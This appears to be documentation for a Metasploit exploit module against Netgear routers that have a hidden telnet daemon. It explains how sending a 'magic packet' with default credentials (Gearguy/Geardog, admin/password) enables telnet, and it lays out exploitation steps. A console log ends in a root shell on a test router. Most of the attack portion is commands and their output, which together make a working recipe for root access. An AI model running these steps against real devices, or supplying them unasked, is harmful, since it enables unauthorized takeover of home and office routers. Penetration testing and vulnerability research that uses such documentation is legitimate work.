## Intro Several models of Netgear devices have a hidden telnet daemon that can be enabled for remote LAN users by sending a 'magic packet' to the device. Upon successful connect, a root shell should be presented to the user. There are many devices which contain this daemon, for a full list see [OpenWrt](https://wiki.openwrt.org/toh/netgear/telnet.console) This module has been successfully tested against: - AC1450 in whatever version I bought it with (TCP) - AC1450 latest V1.0.0.36_10.0.17 (UDP) - N300 WNR2000 v3 (TCP) ## Setup A MAC address is required for exploitation. To determine the MAC address of the device: 1. Ping the device to force an ARP lookup: ```ping -c 1 [IP]``` 2. Get the MAC: ```arp -an [IP]``` ## Targets **0 (Automatic)** Detect if a device listens on TCP or UDP. **1 (TCP)** Older devices usually listen on TCP. **2 (UDP)** Newer devices usually listen on UDP. ## Options **MAC** Set this to the MAC address of the device. You can use `ping` and `arp` to find it. **USERNAME** If this is an older device, it'll take the value of `super_username` in `nvram`. `Gearguy` is usually correct. If this is a newer device, it'll take the web UI username, which is usually unchanged from `admin`. **PASSWORD** If this is an older device, it'll take the value of `super_passwd` in `nvram`. `Geardog` is usually correct. If this is a newer device, it'll take the web UI password, which is usually unchanged from `password`. **VERBOSE** This will display the username and password used in the magic packet. ## Exploitation 1. Make sure you have a vulnerable device 2. Start metasploit 3. ```use exploit/linux/telnet/netgear_telnetenable``` 4. ```set rhost [IP]``` 5. ```set mac [MAC Address]``` 6. ```exploit``` 7. Enjoy a root shell! ## Usage ``` msf5 > use exploit/linux/telnet/netgear_telnetenable msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 rhost => 192.168.1.1 msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1 [*] exec: ping -c 1 192.168.1.1 PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. 64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.19 ms --- 192.168.1.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 1.198/1.198/1.198/0.000 ms msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1 [*] exec: arp -an 192.168.1.1 ? (192.168.1.1) at [redacted] [ether] on wlan0 msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted] mac => [redacted] msf5 exploit(linux/telnet/netgear_telnetenable) > set verbose true verbose => true msf5 exploit(linux/telnet/netgear_telnetenable) > run [+] 192.168.1.1:23 - Detected telnetenabled on UDP [*] 192.168.1.1:23 - Using creds admin:password [*] 192.168.1.1:23 - Generating magic packet [*] 192.168.1.1:23 - Connecting to telnetenabled [*] 192.168.1.1:23 - Sending magic packet [*] 192.168.1.1:23 - Disconnecting from telnetenabled [*] 192.168.1.1:23 - Waiting for telnetd [*] 192.168.1.1:23 - Connecting to telnetd [*] Found shell. id id uid=0 gid=0(root) # uname -a uname -a Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown # ``` If you've already exploited TelnetEnable, the exploit will attempt to connect to `telnetd` directly. This saves us from sending the magic packet again. ``` msf5 exploit(linux/telnet/netgear_telnetenable) > run [+] 192.168.1.1:23 - Detected telnetd on TCP [*] 192.168.1.1:23 - Connecting to telnetd [*] Found shell. ```